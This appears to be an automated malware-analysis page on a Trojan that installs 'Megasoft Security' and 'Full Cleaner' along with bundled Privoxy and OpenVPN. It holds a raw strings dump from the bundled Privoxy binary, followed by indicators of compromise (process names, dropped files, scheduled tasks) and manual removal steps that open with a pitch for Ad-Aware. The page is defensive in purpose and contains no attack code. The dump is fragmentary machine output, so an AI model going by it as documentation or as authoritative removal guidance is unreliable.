Waiting for the next client request on socket %d. Keeping the server socket %d to %s open.

Client request %u arrived in time on socket %d.

Tainting client socket %d due to unread data.

Waiting for the next client request on socket %d. No server socket to keep open.

Client request %d has been pipelined on socket %d and the socket is still alive.

Waiting for %d connections to timeout.

Listening on port %d on IP address %s

can't bind to %s:%d: %E

Listening on port %d on all IP addresses

can't bind to %s:%d: There may be another Privoxy or some other proxy running on port %d

can't bind to %s:%d: The hostname is not resolvable

malloc(%d) for csp_list failed: %E

Connection from %s on socket %d dropped due to ACL

Rejecting connection from %s. Maximum number of connections reached.

config.txt

Directive %s used with invalid argument '%s'. Use either '0' or '1'.

Directive %s used without argument

hXXp://VVV.privoxy.org/3.0.23/user-manual/

Ignoring unrecognized directive '%s' (%uU) in line %lu in configuration file (%s).

config.html#

Config line too long: %s

invalid bind port spec %s

log-font-name argument '%s' is longer than %u characters.

Reloading configuration file '%s'

127.0.0.1:8118

Reducing the default-server-timeout from %d to the keep-alive-timeout %d.

Too many 'listen-address' directives in config file - limit is %d.

Failed to enlist ordered header: %s

can't check configuration file '%s': %E

Too many 'filterfile' directives in config file - limit is %d.

can't open configuration file '%s': %E

Bad URL specifier for forward-socks4a directive in configuration file.

WARNING: Bad URL specifier for forward-socks4a directive in configuration file.

Too many 'actionsfile' directives in config file - limit is %d.

Invalid default-server-timeout value: %s

Invalid destination address, port or netmask for deny-access directive in configuration file: "%s"

WARNING: Invalid destination address, port or netmask for deny-access directive in configuration file: "

Invalid socket-timeout: '%s'

Bad URL specifier for forward directive in configuration file.

WARNING: Bad URL specifier for forward directive in configuration file.

Invalid destination address, port or netmask for permit-access directive in configuration file: "%s"

WARNING: Invalid destination address, port or netmask for permit-access directive in configuration file: "

Invalid source address, port or netmask for permit-access directive in configuration file: "%s"

WARNING: Invalid source address, port or netmask for permit-access directive in configuration file: "

Invalid source address, port or netmask for deny-access directive in configuration file: "%s"

WARNING: Invalid source address, port or netmask for deny-access directive in configuration file: "

Bad URL specifier for forward-socks4 directive in configuration file.

WARNING: Bad URL specifier for forward-socks4 directive in configuration file.

Loading trust file: %s

can't load trustfile '%s': %E

Too many trusted referrers. Current limit is %d, you are using %d.

Additional trusted referrers are treated like ordinary trusted URLs.

Loading filter file: %s

Reading in filter "%s" ("%s")

Adding dynamic re_filter job '%s' to filter %s succeeded.

Adding static re_filter job '%s' to dynamic filter %s succeeded.

Adding re_filter job '%s' to filter %s succeeded.

can't load re_filterfile '%s': %E

Ignoring job %s outside filter block in %s, line %d

Out of memory while enlisting re_filter job '%s' for filter %s.

Adding re_filter job '%s' to filter %s failed: %s

HTTP/

%Y-%m-%d

%H:%M:%S

%a %b %e %H:%M:%S %Y

%I:%M:%S %p

%m/%d/%y

Buffer limit reached while extending the buffer (iob). Needed: %d. Limit: %d

1.2.3

Decompression successful. Old size: %d, new size: %d.

Unreasonable amount of bytes to skip (%d). Stopping decompression

Unexpected error decompressing the buffer (iob): %d==%d, %d>%d, %d<%d

zstr.avail_out == tmpbuf   bufsize - (char *)zstr.next_out

(char *)zstr.next_out == tmpbuf   ((char *)oldnext_out - buf)

Inconsistent stream state after decompression: %s

Skipping %d bytes for gzip compression. Does this sound right?

Unexpected error while decompressing to the buffer (iob): %s

Merged multiple header lines to: '%s'

Reducing whitespace in '%s'

Converting tab to space in '%s'

Failed to read a multi-line header properly: '%s'

Ignoring single quote in '%s'

scan: %s

Tagger '%s' created an empty tag. Ignored.

Enlisting sorted header %s

Problems with tagger '%s' and header '%s': %s

Tagger %s has empty joblist. Nothing to do.

Insufficient memory to add tag '%s', based on tagger '%s' and header '%s'

Tagger '%s' didn't add tag '%s'. Tag already present

Tagger '%s' added tag '%s'. %s

Enlisting left-over header %s

Failed to enlist %s

filtering '%s' (size %d) with '%s' ...

Transforming "%s" to "%s"

... produced %d hits (new size %d).

Removing empty header %s

Filtering '%s' with '%s' didn't work out: %s

Freeing what's left: %s

Keeping the server header '%s' around.

Replaced: '%s' with '%s'

timeout=%u

Couldn't parse: %s

Server keep-alive timeout is %u. Sticking with %u.

Reducing keep-alive timeout from %u to %u.

Forwarding proxy authentication headers is disabled. Crunching: %s

Couldn't parse: '%s'. Using default timeout %u

keep-alive support is disabled. Crunching: %s.

Client keep-alive timeout is %u. Sticking with %u.

Crunching invalid header: %s

Keeping the client header '%s' around. The connection will not be kept alive.

Keeping the client header '%s' around. The server connection will be kept alive if possible.

Removing '%s' to imply keep-alive.

crumble crunched: %s!

The client connection can be kept alive due to: %s

Unsupported client expectaction: %s

Crunching server header: %s (contains: %s)

%s not replaced. It doesn't look like a content type that should be filtered. Enable force-text-mode if you know what you're doing.

Multiple Content-Type headers detected. Removing and ignoring: %s

Modified: %s!

Marking content type for %s as CT_TABOO because of %s.

Removing: %s

Crunching: %s

Crunching %s!

Content-Disposition header crunched and replaced with: %s

Referer: hXXp://

Referer forged to: %s

Referer replaced with: %s

Parameter:  hide-referrer{%s} is a bad idea, but I don't care.

New host is: %s. Crunching %s!

Accept-Language header crunched and replaced with: %s

Crunching client header: %s (contains: %s)

Modified: %s

Crunched outgoing cookie: %s

Appended client IP address to %s

Invalid change-x-forwarded-for parameter: '%s'

Content modified with no Content-Length header set. Created: %s.

Max-Forwards: %d

Max-Forwards value for %s request reduced to %d.

New host and port from Host field: %s = %s:%d

Crunching %s

Content filtering is enabled. Crunching: '%s' to prevent range-mismatch problems.

addh-unique: Host: %s

addh: %s

Adding: %s

A HTTP/1.1 response without Connection header implies keep-alive.

HTTP/%u.%u %d

Unsupported HTTP version. Downgrading to 1.1.

HTTP/%u.%u %d %s

Response line lacks reason phrase: %s

Response line '%s' changed to '%s'

Downgrading answer to HTTP/1.0

Failed to parse the response line: %s

%a, %d-%b-%y %H:%M:%S

%a, %d %b %Y %H:%M:%S

%a, %d-%b-%Y %H:%M:%S

%A, %d-%b-%Y %H:%M:%S

%A %b %d %H:%M:%S %Y

Failed to parse '%s' using '%s'. Moving on.

Randomizing: %s

Couldn't parse time in %s (crunching!)

Reset to present time: %s

Randomizing '%s' failed. Crunching the header without replacement.

Randomized: %s (added %d da%s %d hou%s %d minut%s %d second%s

Randomizing: %s (random range: %d minut%s)

Randomized: %s (%s %d hou%s %d minut%s %d second%s

Crunching incoming cookie: %s

Cookie rewritten to a temporary one: %s

Can't parse '%s', send by %s. Unsupported time format?

Cookie '%s' is already expired and can pass unmodified.

; expires=%a, %d-%b-%Y %H:%M:%S GMT

Cookie rewritten to: %s

Cookie '%s' can pass unmodified. Its lifetime is below the limit.

Invalid cookie lifetime limit: %s

Destination extracted from "Host:" header. New request URL: %s

Failed to get the Content-Length in %s

$Id: urlmatch.h,v 1.21 2013/11/24 14:25:19 fabiankeil Exp $

$Id: urlmatch.c,v 1.85 2014/07/25 11:56:26 fabiankeil Exp $

urlmatch.c

Invalid port in URL: %s.

REPORT

HTTP/%u.%u

Unsupported HTTP version: %s

Unknown HTTP method detected: %s

The only supported HTTP versions are 1.0 and 1.1. This rules out: %s

strlen(http_version) >= 8

Invalid anchoring in compile_pattern %d

error compiling %s from %s: %s

%s\.?$

http:[^

RICHED20.DLL

RICHED32.DLL

doc\faq\index.html

doc\user-manual\index.html

LICENSE.txt

Now toggled %s

hXXp://config.privoxy.org/show-status

Privoxy version 3.0.23 for Windows

Copyright (C) 2000-2010 the Privoxy Team (hXXp://VVV.privoxy.org/)

GNU General Public License, version 2: hXXp://VVV.gnu.org/licenses/old-licenses/gpl-2.0.html

Advapi32.dll

Can't load Advapi32.dll -- LoadLibrary failed!

This system doesn't support installing Privoxy as a service.

"%s" --service

*** IMPORTANT NOTE: You should now use the Services control panel to

><# *~%^-:;!@

s%c\$%s%c%s%cgT

%s%cgT

* ?{^.$|()[

POSIX collating elements are not supported

this version of PCRE is not compiled with PCRE_UTF8 support

erroffset passed as NULL

operand of unlimited repeat could match the empty string

%s%s%-6d

VirtualQuery failed for %d bytes at address %p

Unknown pseudo relocation bit size %d.

Unknown pseudo relocation protocol version %d.

ShellExecuteA

GetKeyState

msvcrt.dll

mgwz.dll

GDI32.dll

KERNEL32.dll

SHELL32.DLL

USER32.dll

WS2_32.DLL

56737777;;

.DDDDDDDHH

IIMSMSMSM*.MVM

*))))*)*))<@

The Privoxy team - VVV.privoxy.org

privoxy.exe

Remove it with Ad-Aware

1. Click (here) to download and install Ad-Aware Free Antivirus.
2. Update the definition files.
3. Run a full scan of your computer.

Manual removal*

1. Terminate malicious process(es) (How to End a Process With the Task Manager):
   

   %original file name%.exe:1240
   1.tmp.exe:1732
   openvpnserv.exe:1768
   privoxy.exe:2028
   privoxy.exe:596
   3.tmp.exe:1772
   helloworld.exe:744
   2.tmp.exe:1676
   jptask.exe:240
   

2. Delete the original Trojan file.
   
3. Delete or disinfect the following files created/modified by the Trojan:
   

   %Documents and Settings%\%current user%\Local Settings\Temp\is-SJ9IE.tmp\dc452e3893e90bc26b0ec26ad95c293a.tmp (7386 bytes)
   %Documents and Settings%\%current user%\Application Data\Full Cleaner\Full Cleaner.exe (5873 bytes)
   %WinDir%\Tasks\Full Cleaner Logon.job (304 bytes)
   %WinDir%\Tasks\Full Cleaner.job (304 bytes)
   %Program Files%\Megasoft Security\config.txt (411 bytes)
   %Program Files%\Megasoft Security\privoxy.exe (1652 bytes)
   %Program Files%\Megasoft Security\default.action (21 bytes)
   %Program Files%\Megasoft Security\default.filter (243 bytes)
   %Program Files%\Megasoft Security\mgwz.dll (86 bytes)
   %Program Files%\Megasoft Security\jptask.exe (3878 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\2.tmp.exe (242047 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\1.tmp.exe (107559 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\3.tmp.exe (144863 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\is-GU2O8.tmp\helloworld.exe (31 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\is-GU2O8.tmp\json_parser.exe (4545 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\is-GU2O8.tmp\_isetup\_shfoldr.dll (23 bytes)
   %Documents and Settings%\All Users\Start Menu\Programs\OpenVPN\Shortcuts\OpenVPN configuration file directory.lnk (683 bytes)
   %Program Files%\OpenVPN\bin\libpkcs11-helper-1.dll (3435 bytes)
   %Program Files%\OpenVPN\bin\liblzo2-2.dll (3516 bytes)
   %Program Files%\OpenVPN\doc\INSTALL-win32.txt (2 bytes)
   %Documents and Settings%\All Users\Desktop\OpenVPN GUI.lnk (756 bytes)
   %Documents and Settings%\All Users\Start Menu\Programs\OpenVPN\Shortcuts\OpenVPN log file directory.lnk (664 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\nso5.tmp\UserInfo.dll (6 bytes)
   %Program Files%\OpenVPN\sample-config\client.ovpn (3 bytes)
   %Program Files%\OpenVPN\doc\openvpn.8.html (6328 bytes)
   %Program Files%\OpenVPN\doc\license.txt (27 bytes)
   %Documents and Settings%\All Users\Start Menu\Programs\OpenVPN\Shortcuts\OpenVPN Sample Configuration Files.lnk (720 bytes)
   %Documents and Settings%\All Users\Start Menu\Programs\OpenVPN\OpenVPN GUI.lnk (768 bytes)
   %Program Files%\OpenVPN\bin\ssleay32.dll (11754 bytes)
   %Program Files%\OpenVPN\bin\libeay32.dll (34277 bytes)
   %Documents and Settings%\All Users\Start Menu\Programs\OpenVPN\Documentation\OpenVPN HOWTO.url (55 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\nso5.tmp\nsExec.dll (8 bytes)
   %Documents and Settings%\All Users\Start Menu\Programs\OpenVPN\Documentation\OpenVPN Manual Page.lnk (769 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\nso5.tmp\ns7.tmp (8 bytes)
   %Program Files%\OpenVPN\Uninstall.exe (167 bytes)
   %Program Files%\OpenVPN\bin\openvpn-gui.exe (10876 bytes)
   %Program Files%\OpenVPN\config\README.txt (365 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\nso5.tmp\System.dll (23 bytes)
   %Program Files%\OpenVPN\bin\openvpn.exe (19349 bytes)
   %Program Files%\OpenVPN\sample-config\sample.ovpn (3 bytes)
   %Documents and Settings%\All Users\Start Menu\Programs\OpenVPN\Utilities\Generate a static OpenVPN key.lnk (1 bytes)
   %Documents and Settings%\All Users\Start Menu\Programs\OpenVPN\Documentation\OpenVPN Windows Notes.lnk (784 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\nso5.tmp\nsProcess.dll (4 bytes)
   %Program Files%\OpenVPN\log\README.txt (143 bytes)
   %Documents and Settings%\All Users\Start Menu\Programs\OpenVPN\Uninstall OpenVPN.lnk (521 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\nso5.tmp\ns6.tmp (8 bytes)
   %Documents and Settings%\All Users\Start Menu\Programs\OpenVPN\Documentation\OpenVPN Web Site.url (45 bytes)
   %Program Files%\OpenVPN\sample-config\server.ovpn (10 bytes)
   %Documents and Settings%\All Users\Start Menu\Programs\OpenVPN\Documentation\OpenVPN Wiki.url (69 bytes)
   %Documents and Settings%\All Users\Start Menu\Programs\OpenVPN\Documentation\OpenVPN Support.url (80 bytes)
   %Program Files%\OpenVPN\bin\openvpnserv.exe (1568 bytes)
   %Program Files%\OpenVPN\icon.ico (22 bytes)
   %WinDir%\Tasks\Megasoft Security Uninstaller.job (242 bytes)

4. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
   
5. Reboot the computer.
   

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.